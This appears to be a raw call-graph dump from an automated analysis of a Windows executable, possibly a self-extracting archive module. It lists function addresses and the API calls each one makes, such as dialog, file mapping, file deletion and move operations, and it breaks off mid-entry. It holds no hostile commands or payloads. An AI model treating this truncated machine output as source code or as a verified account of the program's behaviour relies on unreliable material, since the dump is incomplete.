___std_exception_copy 24715->24762 24716 d7aa9 24718 d0d6c _ValidateLocalCookies 5 API calls 24716->24718 24720 d7ab6 24718->24720 24719 d776d 24721 d0d6c _ValidateLocalCookies 5 API calls 24719->24721 24720->24666 24723 d7779 24721->24723 24723->24666 24724->24716 24763 d7640 5 API calls _ValidateLocalCookies 24724->24763 24726 bb122 24725->24726 24727 bb135 24725->24727 24730 bb140 24726->24730 24764 b7800 78 API calls 24726->24764 24729 bb148 SetFilePointer 24727->24729 24727->24730 24729->24730 24731 bb164 GetLastError 24729->24731 24730->24675 24731->24730 24732 bb16e 24731->24732 24732->24730 24765 b7800 78 API calls 24732->24765 24735 ba825 24734->24735 24740 ba836 24734->24740 24736 ba838 24735->24736 24737 ba831 24735->24737 24735->24740 24771 ba880 24736->24771 24766 ba9ae 24737->24766 24740->24698 24742 bae6c 24741->24742 24744 bae73 24741->24744 24742->24675 24744->24742 24745 ba9e5 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24744->24745 24786 b77bd 78 API calls 24744->24786 24745->24744 24746->24675 24747->24672 24748->24683 24749->24683 24750->24683 24751->24683 24752->24683 24753->24683 24754->24681 24755->24684 24756->24690 24758 bcf3f _wcslen 24757->24758 24759 bcfe7 GetCurrentDirectoryW 24758->24759 24760 bcf68 _wcslen 24758->24760 24759->24760 24760->24705 24761->24715 24762->24719 24763->24724 24764->24727 24765->24730 24767 ba9e1 24766->24767 24768 ba9b7 24766->24768 24767->24740 24768->24767 24777 bb470 24768->24777 24772 ba8aa 24771->24772 24773 ba88c 24771->24773 24774 ba8c9 24772->24774 24785 b7685 77 API calls 24772->24785 24773->24772 24775 ba898 CloseHandle 24773->24775 24774->24740 24775->24772 24778 cffc0 24777->24778 24779 bb47d DeleteFileW 24778->24779 24780 ba9df 24779->24780 24781 bb490 24779->24781 24780->24740 24782 bcf32 GetCurrentDirectoryW 24781->24782 24783 bb4a4 24782->24783 24783->24780 24784 bb4a8 DeleteFileW 24783->24784 24784->24780 24785->24774 24786->24744 24788 d9093 _abort 24787->24788 24789 d90ac 24788->24789 24790 d909a 24788->24790 24811 dbde1 EnterCriticalSection 24789->24811 24823 d91e1 GetModuleHandleW 24790->24823 24793 d909f 24793->24789 24824 d9225 GetModuleHandleExW 24793->24824 24794 d9151 24812 d9191 24794->24812 24798 d9128 24803 d9140 24798->24803 24808 d9e51 _abort 5 API calls 24798->24808 24800 d90b3 24800->24794 24800->24798 24832 d9ba0 20 API calls _abort 24800->24832 24801 d916e 24815 d91a0 24801->24815 24802 d919a 24833 e3540 5 API calls _ValidateLocalCookies 24802->24833 24804 d9e51 _abort 5 API calls 24803->24804 24804->24794 24808->24803 24811->24800 24834 dbe31 LeaveCriticalSection 24812->24834 24814 d916a 24814->24801 24814->24802 24835 dc226 24815->24835 24818 d91ce 24821 d9225 _abort 8 API calls 24818->24821 24819 d91ae GetPEB 24819->24818 24820 d91be GetCurrentProcess TerminateProcess 24819->24820 24820->24818 24822 d91d6 ExitProcess 24821->24822 24823->24793 24825 d924f GetProcAddress 24824->24825 24826 d9272 24824->24826 24827 d9264 24825->24827 24828 d9278 FreeLibrary 24826->24828 24829 d9281 24826->24829 24827->24826 24828->24829 24830 d0d6c _ValidateLocalCookies 5 API calls 24829->24830 24831 d90ab 24830->24831 24831->24789 24832->24798 24834->24814 24836 dc24b 24835->24836 24837 dc241 24835->24837 24838 dbe48 _abort 5 API calls 24836->24838 24839 d0d6c _ValidateLocalCookies 5 API calls 24837->24839 24838->24837 24840 d91aa 24839->24840 24840->24818 24840->24819 24841 cf41c 24843 cf325 24841->24843 24844 cf9d9 24843->24844 24870 cf737 24844->24870 24846 cf9e9 24847 cfa6a 24846->24847 24848 cfa46 24846->24848 24851 cfae2 LoadLibraryExA 24847->24851 24853 cfb43 24847->24853 24855 cfb55 24847->24855 24864 cfc11 24847->24864 24849 cf977 DloadReleaseSectionWriteAccess 6 API calls 24848->24849 24850 cfa51 RaiseException 24849->24850 24865 cfc3f 24850->24865 24852 cfaf5 GetLastError 24851->24852 24851->24853 24856 cfb1e 24852->24856 24857 cfb08 24852->24857 24854 cfb4e FreeLibrary 24853->24854 24853->24855 24854->24855 24858 cfbb3 GetProcAddress 24855->24858 24855->24864 24860 cf977 DloadReleaseSectionWriteAccess 6 API calls 24856->24860 24857->24853 24857->24856 24859 cfbc3 GetLastError 24858->24859 24858->24864 24862 cfbd6 24859->24862 24861 cfb29 RaiseException 24860->24861 24861->24865 24862->24864 24866 cf977 DloadReleaseSectionWriteAccess 6 API calls 24862->24866 24879 cf977 24864->24879 24865->24843 24867 cfbf7 RaiseException 24866->24867 24868 cf737 ___delayLoadHelper2@8 6 API calls 24867->24868 24869 cfc0e 24868->24869 24869->24864 24871 cf769 24870->24871 24872 cf743 24870->24872 24871->24846 24887 cf7e0 24872->24887 24874 cf748 24875 cf764 24874->24875 24890 cf909 24874->24890 24895 cf76a GetModuleHandleW GetProcAddress GetProcAddress 24875->24895 24878 cf9b2 24878->24846 24880 cf989 24879->24880 24881 cf9ab 24879->24881 24882 cf7e0 DloadReleaseSectionWriteAccess 3 API calls 24880->24882 24881->24865 24883 cf98e 24882->24883 24884 cf9a6 24883->24884 24885 cf909 DloadProtectSection 3 API calls 24883->24885 24898 cf9ad GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24884->24898 24885->24884 24896 cf76a GetModuleHandleW GetProcAddress GetProcAddress 24887->24896 24889 cf7e5 24889->24874 24892 cf91e DloadProtectSection 24890->24892 24891 cf924 24891->24875 24892->24891 24893 cf959 VirtualProtect 24892->24893 24897 cf81f VirtualQuery GetSystemInfo 24892->24897 24893->24891 24895->24878 24896->24889 24897->24893 24898->24881 26119 c741e 138 API calls __InternalCxxFrameHandler 24901 cf31b 14 API calls ___delayLoadHelper2@8 26177 d961a 55 API calls _free 26120 cd410 92 API calls _swprintf 24907 da610 24915 dbf5f 24907->24915 24911 da639 24912 da62c 24912->24911 24923 da640 11 API calls 24912->24923 24914 da624 24916 dbe48 _abort 5 API calls 24915->24916 24917 dbf86 24916->24917 24918 dbf8f 24917->24918 24919 dbf9e TlsAlloc 24917->24919 24920 d0d6c _ValidateLocalCookies 5 API calls 24918->24920 24919->24918 24921 da61a 24920->24921 24921->24914 24922 da589 20 API calls 2 library calls 24921->24922 24922->24912 24923->24914 26149 b6920 41 API calls __EH_prolog 26196 d9320 52 API calls 2 library calls 26121 b1025 29 API calls 26197 d0723 20 API calls 24943 b213d 24944 b2148 24943->24944 24945 b2150 24943->24945 24949 b2162 27 API calls Concurrency::cancel_current_task 24944->24949 24947 b214e 24945->24947 24948 cfeae 27 API calls 24945->24948 24948->24947 24949->24947 26151 c0534 FreeLibrary 26199 d0737 29 API calls _abort 26122 b2430 26 API calls std::bad_exception::bad_exception 24951 ca530 24952 ca53b 24951->24952 24953 ca555 24951->24953 24952->24953 24955 cb181 24952->24955 24956 cb198 24955->24956 24957 cb18a 24955->24957 24956->24953 24957->24956 24959 ca6c1 24957->24959 24960 ca6d0 _wcslen ___std_exception_copy 24959->24960 24969 ca7f6 24959->24969 24960->24969 24970 c3328 CompareStringW _wcslen 24960->24970 24962 ca749 _wcslen 24963 ca78b GlobalAlloc 24962->24963 24964 ca7c0 24963->24964 24965 ca7a1 WideCharToMultiByte 24963->24965 24966 ca7d4 CreateStreamOnHGlobal 24964->24966 24965->24964 24967 ca7e8 24966->24967 24966->24969 24971 ca59b 24967->24971 24969->24956 24970->24962 24978 ca5c4 24971->24978 24972 ca6b0 24972->24969 24974 ca67a 24974->24972 24975 ca680 ShowWindow SetWindowTextW 24974->24975 24977 ca6af 24975->24977 24977->24972 24978->24972 24979 cad0e CompareStringW _wcslen ___std_exception_copy 24978->24979 24979->24974 26123 b2037 143 API calls __EH_prolog 26152 d0530 46 API calls __RTC_Initialize 25013 cfd48 25014 cfd52 25013->25014 25015 cf9d9 ___delayLoadHelper2@8 14 API calls 25014->25015 25016 cfd5f 25015->25016 26124 cb440 GdipCloneImage GdipAlloc 26200 ce740 71 API calls 26153 d1540 51 API calls 2 library calls 26128 ba850 81 API calls Concurrency::cancel_current_task 26129 cc450 101 API calls 26130 ca450 IsWindow 26181 db650 71 API calls _free 26182 cfe51 48 API calls _unexpected 26183 e1a50 IsProcessorFeaturePresent 26202 dc368 27 API calls 3 library calls 26184 d3e7b 38 API calls 4 library calls 26159 b2570 97 API calls 26133 c8870 133 API calls 26160 d1170 RaiseException _com_error::_com_error CallUnexpected 26134 b1075 44 API calls 26186 cd8c6 112 API calls 4 library calls 24128 cb080 24129 cb08f SetWindowLongW 24128->24129 24130 cb0a9 NtdllDefWindowProc_W 24128->24130 24133 ca812 24129->24133 24132 cb0a8 24132->24130 24138 cfeae 24133->24138 24135 ca829 24137 ca859 24135->24137 24151 cb0be CLSIDFromString CoCreateInstance 24135->24151 24137->24132 24140 cfeb3 ___std_exception_copy 24138->24140 24139 cfecd 24139->24135 24140->24139 24142 cfecf 24140->24142 24155 d8e4c 7 API calls 2 library calls 24140->24155 24143 b48f5 Concurrency::cancel_current_task 24142->24143 24144 cfed9 24142->24144 24153 d3330 RaiseException 24143->24153 24156 d3330 RaiseException 24144->24156 24147 b4911 24149 b4927 24147->24149 24154 b136b 26 API calls Concurrency::cancel_current_task 24147->24154 24148 d0810 24149->24135 24152 cb0f6 24151->24152 24152->24137 24153->24147 24154->24149 24155->24140 24156->24148 26162 db580 21 API calls 2 library calls 26187 d3a80 6 API calls 4 library calls 26203 d0780 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26163 cd8c6 109 API calls 4 library calls 26164 cf59f 14 API calls ___delayLoadHelper2@8 24902 cf595 24904 cf53e 24902->24904 24903 cf9d9 ___delayLoadHelper2@8 14 API calls 24903->24904 24904->24903 26136 ca490 GetClientRect CopyRect 26137 dd090 GetCommandLineA GetCommandLineW 26205 cc7a0 110 API calls 26206 d0eff 9 API calls 2 library calls 24932 dbda0 24933 dbdab 24932->24933 24934 dc0ba 11 API calls 24933->24934 24935 dbdd4 24933->24935 24937 dbdd0 24933->24937 24934->24933 24938 dbe00 DeleteCriticalSection 24935->24938 24938->24937 26165 cd8c6 98 API calls 4 library calls 26208 cd8c6 103 API calls 4 library calls 26140 db8b0 21 API calls 26141 d9cb0 7 API calls ___scrt_uninitialize_crt 24980 b10b5 24985 b644d 24980->24985 24984 b10c4 24986 b6457 __EH_prolog 24985->24986 24994 bc9d8 24986->24994 24988 b6464 24997 c04e5 24988->24997 24990 b64bb 25001 b665c GetCurrentProcess GetProcessAffinityMask 24990->25001 24992 b10ba 24993 d0362 29 API calls 24992->24993 24993->24984 25002 bca2e 24994->25002 24998 c04ef __EH_prolog 24997->24998 25011 b4846 41 API calls 24998->25011 25000 c050b 25000->24990 25001->24992 25003 bca40 __cftof 25002->25003 25006 c23f4 25003->25006 25009 c23b6 GetCurrentProcess GetProcessAffinityMask 25006->25009 25010 bca2a 25009->25010 25010->24988 25011->25000 26167 e3db0 VariantClear 26209 e03b0 51 API calls 25020 cc9c0 25021 cc9ca __EH_prolog 25020->25021 25186 b12f6 25021->25186 25024 cd0fb 25263 ce7de 25024->25263 25026 cca0a 25028 cca18 25026->25028 25029 cca7b 25026->25029 25104 cca21 25026->25104 25033 cca1c 25028->25033 25034 cca58 25028->25034 25032 ccb0e GetDlgItemTextW 25029->25032 25038 cca91 25029->25038 25030 cd124 25036 cd12d SendDlgItemMessageW 25030->25036 25037 cd13e GetDlgItem SendMessageW 25030->25037 25031 cd116 SendMessageW 25031->25030 25032->25034 25035 ccb4b 25032->25035 25043 bf937 53 API calls 25033->25043 25033->25104 25039 ccb3f KiUserCallbackDispatcher 25034->25039 25034->25104 25040 ccb60 GetDlgItem 25035->25040 25184 ccb54 25035->25184 25036->25037 25281 cb64d GetCurrentDirectoryW 25037->25281 25042 bf937 53 API calls 25038->25042 25039->25104 25044 ccb74 SendMessageW SendMessageW 25040->25044 25045 ccb97 SetFocus 25040->25045 25047 ccaae SetDlgItemTextW 25042->25047 25048 cca3b 25043->25048 25044->25045 25051 ccba7 25045->25051 25065 ccbb3 25045->25065 25046 cd16e GetDlgItem 25049 cd18b 25046->25049 25050 cd191 SetWindowTextW 25046->25050 25052 ccab9 25047->25052 25303 b122f SHGetMalloc 25048->25303 25049->25050 25282 cbbb0 GetClassNameW 25050->25282 25056 bf937 53 API calls 25051->25056 25058 ccac6 GetMessageW 25052->25058 25052->25104 25054 cd041 25057 bf937 53 API calls 25054->25057 25060 ccbb1 25056->25060 25062 cd051 SetDlgItemTextW 25057->25062 25063 ccadd IsDialogMessageW 25058->25063 25058->25104 25197 ce607 25060->25197 25061 cd3e8 SetDlgItemTextW 25061->25104 25067 cd065 25062->25067 25063->25052 25068 ccaec TranslateMessage DispatchMessageW 25063->25068 25070 bf937 53 API calls 25065->25070 25074 bf937 53 API calls 25067->25074 25068->25052 25073 ccbea 25070->25073 25071 ccc0d 25078 ccc41 25071->25078 25304 bb4c1 25071->25304 25072 cd1dc 25076 cd20c 25072->25076 25080 bf937 53 API calls 25072->25080 25077 b4a20 _swprintf 51 API calls 25073->25077 25106 cd088 _wcslen 25074->25106 25075 cd872 98 API calls 25075->25072 25084 cd872 98 API calls 25076->25084 25138 cd2c4 25076->25138 25077->25060 25208 bb341 25078->25208 25083 cd1ef SetDlgItemTextW 25080->25083 25092 bf937 53 API calls 25083->25092 25093 cd227 25084->25093 25086 cd374 25087 cd389 25086->25087 25088 cd380 EnableWindow 25086->25088 25095 cd3a6 25087->25095 25333 b12b3 GetDlgItem EnableWindow 25087->25333 25088->25087 25089 cd0d9 25098 bf937 53 API calls 25089->25098 25090 ccc65 25214 cbc09 SetCurrentDirectoryW 25090->25214 25091 ccc5a GetLastError 25091->25090 25097 cd203 SetDlgItemTextW 25092->25097 25116 cd252 25093->25116 25314 caee5 ShowWindow 25093->25314 25094 ccc3b 25307 cbeef CreateDirectoryW LocalFree GetCurrentProcess GetLastError 25094->25307 25102 cd3cd 25095->25102 25113 cd3c5 SendMessageW 25095->25113 25097->25076 25098->25104 25100 cd2b7 25109 cd872 98 API calls 25100->25109 25102->25104 25115 bf937 53 API calls 25102->25115 25103 ccc79 25107 ccc82 GetLastError 25103->25107 25108 ccc90 25103->25108 25105 cd39c 25334 b12b3 GetDlgItem EnableWindow 25105->25334 25106->25089 25112 bf937 53 API calls 25106->25112 25107->25108 25114 ccd07 25108->25114 25119 ccd16 25108->25119 25122 ccca0 GetTickCount 25108->25122 25109->25138 25118 cd0bc 25112->25118 25113->25102 25114->25119 25120 ccf42 25114->25120 25117 cca42 25115->25117 25116->25100 25133 cd872 98 API calls 25116->25133 25117->25061 25117->25104 25123 b4a20 _swprintf 51 API calls 25118->25123 25124 ccee7 25119->25124 25125 ccedd 25119->25125 25126 ccd2f GetModuleFileNameW 25119->25126 25223 b12d1 GetDlgItem ShowWindow 25120->25223 25121 cd355 25128 caee5 40 API calls 25121->25128 25129 b4a20 _swprintf 51 API calls 25122->25129 25123->25089 25132 bf937 53 API calls 25124->25132 25125->25034 25125->25124 25308 c05e6 83 API calls 25126->25308 25128->25086 25135 cccbd 25129->25135 25130 bf937 53 API calls 25130->25138 25136 ccef1 25132->25136 25137 cd28c 25133->25137 25134 ccf52 25224 b12d1 GetDlgItem ShowWindow 25134->25224 25215 ba8ce 25135->25215 25143 b4a20 _swprintf 51 API calls 25136->25143 25137->25100 25144 cd295 DialogBoxParamW 25137->25144 25138->25086 25138->25121 25138->25130 25139 ccd57 25142 b4a20 _swprintf 51 API calls 25139->25142 25141 ccf5c 25146 bf937 53 API calls 25141->25146 25145 ccd79 CreateFileMappingW 25142->25145 25148 ccf0f 25143->25148 25144->25034 25144->25100 25151 ccdd7 GetCommandLineW 25145->25151 25179 cce4e __InternalCxxFrameHandler 25145->25179 25149 ccf66 SetDlgItemTextW 25146->25149 25159 bf937 53 API calls 25148->25159 25225 b12d1 GetDlgItem ShowWindow 25149->25225 25150 ccce3 25154 cccf5 25150->25154 25155 cccea GetLastError 25150->25155 25152 ccde8 25151->25152 25309 cc605 SHGetMalloc 25152->25309 25157 ba801 81 API calls 25154->25157 25155->25154 25156 ccf78 SetDlgItemTextW GetDlgItem 25160 ccfad 25156->25160 25161 ccf95 GetWindowLongW SetWindowLongW 25156->25161 25157->25114 25163 ccf29 25159->25163 25226 cd872 25160->25226 25161->25160 25162 cce04 25310 cc605 SHGetMalloc 25162->25310 25167 cce10 25311 cc605 SHGetMalloc 25167->25311 25168 cd872 98 API calls 25170 ccfc9 25168->25170 25251 ceb92 25170->25251 25171 cce1c 25312 c0695 83 API calls 25171->25312 25172 cceb7 25172->25125 25178 ccecd UnmapViewOfFile CloseHandle 25172->25178 25176 cce2d MapViewOfFile 25176->25179 25177 cd872 98 API calls 25182 ccfef 25177->25182 25178->25125 25179->25172 25180 ccea3 Sleep 25179->25180 25180->25172 25180->25179 25181 cd018 25313 b12b3 GetDlgItem EnableWindow 25181->25313 25182->25181 25185 cd872 98 API calls 25182->25185 25184->25034 25184->25054 25185->25181 25187 b1358 25186->25187 25188 b12ff 25186->25188 25336 bf5e1 GetWindowLongW SetWindowLongW 25187->25336 25190 b1365 25188->25190 25335 bf608 62 API calls 2 library calls 25188->25335 25190->25024 25190->25026 25190->25104 25192 b1321 25192->25190 25193 b1327 GetParent 25192->25193 25193->25190 25194 b1334 GetDlgItem 25193->25194 25194->25190 25195 b1344 25194->25195 25195->25190 25196 b134a SetWindowTextW 25195->25196 25196->25190 25337 cc748 PeekMessageW 25197->25337 25200 ce669 SendMessageW SendMessageW 25203 ce6c4 SendMessageW SendMessageW SendMessageW 25200->25203 25204 ce6a5 25200->25204 25201 ce635 25342 ca235 25201->25342 25206 ce71a SendMessageW 25203->25206 25207 ce6f7 SendMessageW 25203->25207 25204->25203 25206->25071 25207->25206 25211 bb34b 25208->25211 25209 bb3dc 25210 bb542 8 API calls 25209->25210 25213 bb405 25209->25213 25210->25213 25211->25209 25211->25213 25345 bb542 25211->25345 25213->25090 25213->25091 25214->25103 25216 ba8d8 25215->25216 25217 ba935 CreateFileW 25216->25217 25218 ba929 25216->25218 25217->25218 25219 ba97f 25218->25219 25220 bcf32 GetCurrentDirectoryW 25218->25220 25219->25150 25221 ba964 25220->25221 25221->25219 25222 ba968 CreateFileW 25221->25222 25222->25219 25223->25134 25224->25141 25225->25156 25227 cd87c __EH_prolog 25226->25227 25228 ccfbb 25227->25228 25366 cc4f4 ExpandEnvironmentStringsW 25227->25366 25228->25168 25232 cdb9a SetWindowTextW 25234 cd8b3 _wcslen _wcsrchr 25232->25234 25234->25228 25234->25232 25238 cd988 SetFileAttributesW 25234->25238 25241 cd9a2 __cftof _wcslen 25234->25241 25367 c3306 CompareStringW 25234->25367 25368 cb64d GetCurrentDirectoryW 25234->25368 25370 bb9ca 6 API calls 25234->25370 25371 bb953 FindClose 25234->25371 25372 cc66e 77 API calls 2 library calls 25234->25372 25373 d520e 25234->25373 25386 cc4f4 ExpandEnvironmentStringsW 25234->25386 25240 cda42 GetFileAttributesW 25238->25240 25238->25241 25240->25234 25242 cda54 DeleteFileW 25240->25242 25241->25234 25241->25240 25244 cdd64 GetDlgItem SetWindowTextW SendMessageW 25241->25244 25247 cdda4 SendMessageW 25241->25247 25369 bcdc0 51 API calls 2 library calls 25241->25369 25242->25234 25245 cda65 25242->25245 25244->25241 25246 b4a20 _swprintf 51 API calls 25245->25246 25248 cda85 GetFileAttributesW 25246->25248 25247->25234 25248->25245 25249 cda9a MoveFileW 25248->25249 25249->25234 25250 cdab2 MoveFileExW 25249->25250 25250->25234 25252 ceb9c __EH_prolog 25251->25252 25398 c197c 25252->25398 25254 cebcd 25402 b64ed 25254->25402 25256 cebeb 25406 b8823 25256->25406 25260 cec3e 25424 b890a 25260->25424 25262 ccfda 25262->25177 25264 ce7e8 25263->25264 25265 cb5c6 4 API calls 25264->25265 25266 ce7ed 25265->25266 25267 ce7f5 GetWindow 25266->25267 25269 cd101 25266->25269 25268 ce815 25267->25268 25267->25269 25268->25269 25270 ce822 GetClassNameW 25268->25270 25272 ce8aa GetWindow 25268->25272 25273 ce846 GetWindowLongW 25268->25273 25269->25030 25269->25031 25930 c3306 CompareStringW 25270->25930 25272->25268 25272->25269 25273->25272 25274 ce856 SendMessageW 25273->25274 25274->25272 25275 ce86c GetObjectW 25274->25275 25931 cb605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25275->25931 25277 ce883 25932 cb5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25277->25932 25933 cb80c 9 API calls 25277->25933 25280 ce894 SendMessageW DeleteObject 25280->25272 25281->25046 25283 cbbd1 25282->25283 25289 cbbf6 25282->25289 25934 c3306 CompareStringW 25283->25934 25285 cbbfb SHAutoComplete 25286 cbc04 25285->25286 25290 cc207 25286->25290 25287 cbbe4 25288 cbbe8 FindWindowExW 25287->25288 25287->25289 25288->25289 25289->25285 25289->25286 25291 cc211 __EH_prolog 25290->25291 25292 b13f8 43 API calls 25291->25292 25293 cc233 25292->25293 25935 b2083 25293->25935 25296 cc25c 25299 b1a7e 143 API calls 25296->25299 25297 cc24d 25298 b1641 87 API calls 25297->25298 25300 cc258 25298->25300 25302 cc27b __InternalCxxFrameHandler ___std_exception_copy 25299->25302 25300->25072 25300->25075 25301 b1641 87 API calls 25301->25300 25302->25301 25303->25117 25943 bb4d3 25304->25943 25307->25078 25308->25139 25309->25162 25310->25167 25311->25171 25312->25176 25313->25184 25951 cac14 LoadCursorW RegisterClassExW 25314->25951 25316 caf0f 25319 caf25 25316->25319 25952 d8a08 26 API calls 2 library calls 25316->25952 25318 caf3d GetWindowRect GetParent MapWindowPoints 25322 caf77 DestroyWindow 25318->25322 25323 caf80 GetParent CreateWindowExW 25318->25323 25319->25318 25953 d8a08 26 API calls 2 library calls 25319->25953 25322->25323 25324 cb008 25323->25324 25325 cafcb 25323->25325 25326 cb00c ShowWindow UpdateWindow 25324->25326 25327 cb01e 25324->25327 25325->25324 25328 cafd0 25325->25328 25326->25327 25327->25116 25328->25327 25954 cad0e CompareStringW _wcslen ___std_exception_copy 25328->25954 25330 cafe8 25330->25327 25331 cafee ShowWindow SetWindowTextW 25330->25331 25332 cb005 25331->25332 25332->25327 25333->25105 25334->25095 25335->25192 25336->25190 25338 cc79c GetDlgItem 25337->25338 25339 cc763 KiUserCallbackDispatcher 25337->25339 25338->25200 25338->25201 25340 cc788 TranslateMessage DispatchMessageW 25339->25340 25341 cc779 IsDialogMessageW 25339->25341 25340->25338 25341->25338 25341->25340 25343 ca23e DestroyWindow 25342->25343 25344 ca24b ShowWindow SendMessageW SendMessageW 25342->25344 25343->25344 25344->25200 25346 bb54f 25345->25346 25347 bb573 25346->25347 25348 bb566 CreateDirectoryW 25346->25348 25349 bb4c1 3 API calls 25347->25349 25348->25347 25350 bb5a6 25348->25350 25351 bb579 25349->25351 25353 bb5b5 25350->25353 25358 bb8e6 25350->25358 25352 bb5b9 GetLastError 25351->25352 25354 bcf32 GetCurrentDirectoryW 25351->25354 25352->25353 25353->25211 25356 bb58f 25354->25356 25356->25352 25357 bb593 CreateDirectoryW 25356->25357 25357->25350 25357->25352 25359 cffc0 25358->25359 25360 bb8f3 SetFileAttributesW 25359->25360 25361 bb909 25360->25361 25362 bb936 25360->25362 25363 bcf32 GetCurrentDirectoryW 25361->25363 25362->25353 25364 bb91d 25363->25364 25364->25362 25365 bb921 SetFileAttributesW 25364->25365 25365->25362 25366->25234 25367->25234 25368->25234 25369->25241 25370->25234 25371->25234 25372->25234 25374 da694 25373->25374 25375 da6ac 25374->25375 25376 da6a1 25374->25376 25378 da6b4 25375->25378 25384 da6bd _abort 25375->25384 25387 da7ee 25376->25387 25381 da65a _free 20 API calls 25378->25381 25379 da6e7 HeapReAlloc 25383 da6a9 25379->25383 25379->25384 25380 da6c2 25394 da7db 20 API calls _abort 25380->25394 25381->25383 25383->25234 25384->25379 25384->25380 25395 d8e4c 7 API calls 2 library calls 25384->25395 25386->25234 25388 da82c 25387->25388 25392 da7fc _abort 25387->25392 25397 da7db 20 API calls _abort 25388->25397 25390 da817 RtlAllocateHeap 25391 da82a 25390->25391 25390->25392 25391->25383 25392->25388 25392->25390 25396 d8e4c 7 API calls 2 library calls 25392->25396 25394->25383 25395->25384 25396->25392 25397->25391 25399 c1989 _wcslen 25398->25399 25433 b1895 25399->25433 25401 c19a1 25401->25254 25403 c197c _wcslen 25402->25403 25404 b1895 79 API calls 25403->25404 25405 c19a1 25404->25405 25405->25256 25407 b882d __EH_prolog 25406->25407 25446 be298 25407->25446 25409 b8855 25410 cfeae 27 API calls 25409->25410 25411 b8899 __cftof 25410->25411 25412 cfeae 27 API calls 25411->25412 25413 b88c0 25412->25413 25452 c5c54 25413->25452 25416 b8a38 25417 b8a42 25416->25417 25418 b8ab5 25417->25418 25481 bb966 25417->25481 25422 b8b1a 25418->25422 25459 b90a2 25418->25459 25420 b8b5c 25420->25260 25422->25420 25487 b1397 75 API calls 25422->25487 25918 ba41a DeleteFileW DeleteFileW GetCurrentDirectoryW __cftof 25424->25918 25426 b892b 25428 b893c Concurrency::cancel_current_task 25426->25428 25919 c3536 25426->25919 25429 b2111 26 API calls 25428->25429 25430 b8963 25429->25430 25431 be339 87 API calls 25430->25431 25432 b896b 25431->25432 25432->25262 25434 b18ff 25433->25434 25435 b18a7 25433->25435 25434->25401 25436 b18d0 25435->25436 25443 b76e9 77 API calls __vswprintf_c_l 25435->25443 25438 d520e 22 API calls 25436->25438 25440 b18f0 25438->25440 25439 b18c6 25444 b775a 76 API calls 25439->25444 25440->25434 25445 b775a 76 API calls 25440->25445 25443->25439 25444->25436 25445->25434 25447 be2a2 __EH_prolog 25446->25447 25448 cfeae 27 API calls 25447->25448 25449 be2e5 25448->25449 25450 cfeae 27 API calls 25449->25450 25451 be309 25450->25451 25451->25409 25453 c5c5e __EH_prolog 25452->25453 25454 cfeae 27 API calls 25453->25454 25455 c5c7a 25454->25455 25456 b88f2 25455->25456 25458 c215f 81 API calls 25455->25458 25456->25416 25458->25456 25460 b90ac __EH_prolog 25459->25460 25488 b13f8 25460->25488 25462 b90c8 25463 b90d9 25462->25463 25650 bb1d2 25462->25650 25467 b9110 25463->25467 25498 b1ad3 25463->25498 25466 b910c 25466->25467 25517 b2032 25466->25517 25642 b1641 25467->25642 25471 b91b2 25521 b924e 25471->25521 25474 b9211 25474->25467 25529 b4264 25474->25529 25541 b92c6 25474->25541 25479 bb966 7 API calls 25480 b9139 25479->25480 25480->25471 25480->25479 25654 bd4d2 CompareStringW _wcslen 25480->25654 25482 bb97b 25481->25482 25483 bb9a9 25482->25483 25907 bba94 25482->25907 25483->25417 25485 bb98b 25485->25483 25486 bb990 FindClose 25485->25486 25486->25483 25487->25420 25489 b13fd __EH_prolog 25488->25489 25490 be298 27 API calls 25489->25490 25491 b1437 25490->25491 25492 cfeae 27 API calls 25491->25492 25496 b14ab 25491->25496 25494 b1498 25492->25494 25494->25496 25497 b644d 43 API calls 25494->25497 25495 b1533 __cftof 25495->25462 25655 bc1f7 25496->25655 25497->25496 25499 b1add __EH_prolog 25498->25499 25505 b1b30 25499->25505 25511 b1c63 25499->25511 25673 b13d9 25499->25673 25501 b1c9e 25676 b1397 75 API calls 25501->25676 25504 b4264 116 API calls 25510 b1ce9 25504->25510 25505->25501 25506 b1cab 25505->25506 25505->25511 25506->25504 25506->25511 25507 b1d31 25508 b1d64 25507->25508 25507->25511 25677 b1397 75 API calls 25507->25677 25508->25511 25515 bb110 80 API calls 25508->25515 25510->25507 25512 b4264 116 API calls 25510->25512 25511->25466 25512->25510 25513 b4264 116 API calls 25514 b1db5 25513->25514 25514->25511 25514->25513 25515->25514 25516 bb110 80 API calls 25516->25505 25518 b2037 __EH_prolog 25517->25518 25520 b2068 25518->25520 25691 b1a7e 25518->25691 25520->25480 25696 be395 25521->25696 25523 b925e 25700 c26f1 GetSystemTime SystemTimeToFileTime 25523->25700 25525 b91cc 25525->25474 25526 c2ea4 25525->25526 25705 cef9b 25526->25705 25530 b4270 25529->25530 25531 b4274 25529->25531 25530->25474 25540 bb110 80 API calls 25531->25540 25532 b4286 25533 b42af 25532->25533 25534 b42a1 25532->25534 25714 b2eb6 116 API calls 3 library calls 25533->25714 25539 b42e1 25534->25539 25713 b395a 104 API calls 3 library calls 25534->25713 25537 b42ad 25537->25539 25715 b2544 75 API calls 25537->25715 25539->25474 25540->25532 25542 b92d0 __EH_prolog 25541->25542 25545 b930e 25542->25545 25560 b973d Concurrency::cancel_current_task 25542->25560 25756 c9c9d 118 API calls 25542->25756 25544 ba18d 25546 ba192 25544->25546 25547 ba1c5 25544->25547 25545->25544 25550 b932f 25545->25550 25545->25560 25546->25560 25787 b8675 167 API calls 25546->25787 25547->25560 25788 c9c9d 118 API calls 25547->25788 25550->25560 25716 b66df 25550->25716 25552 b9545 25555 b9669 25552->25555 25552->25560 25759 b8f6b 39 API calls 25552->25759 25554 b9405 25554->25552 25757 bb5d6 57 API calls 3 library calls 25554->25757 25562 bb966 7 API calls 25555->25562 25564 b96db 25555->25564 25559 b95ac 25758 d8a08 26 API calls 2 library calls 25559->25758 25560->25474 25562->25564 25563 b9935 25766 be4a9 97 API calls 25563->25766 25722 b89c8 25564->25722 25567 b976c 25589 b97c5 25567->25589 25760 b4727 27 API calls 2 library calls 25567->25760 25570 b9a3a 25574 b9a8c 25570->25574 25586 b9a45 25570->25586 25571 b9990 25571->25570 25575 b99bb 25571->25575 25580 b9a2c 25574->25580 25770 b8db3 120 API calls 25574->25770 25577 bb4c1 3 API calls 25575->25577 25575->25580 25583 b9ae8 25575->25583 25576 b9a8a 25581 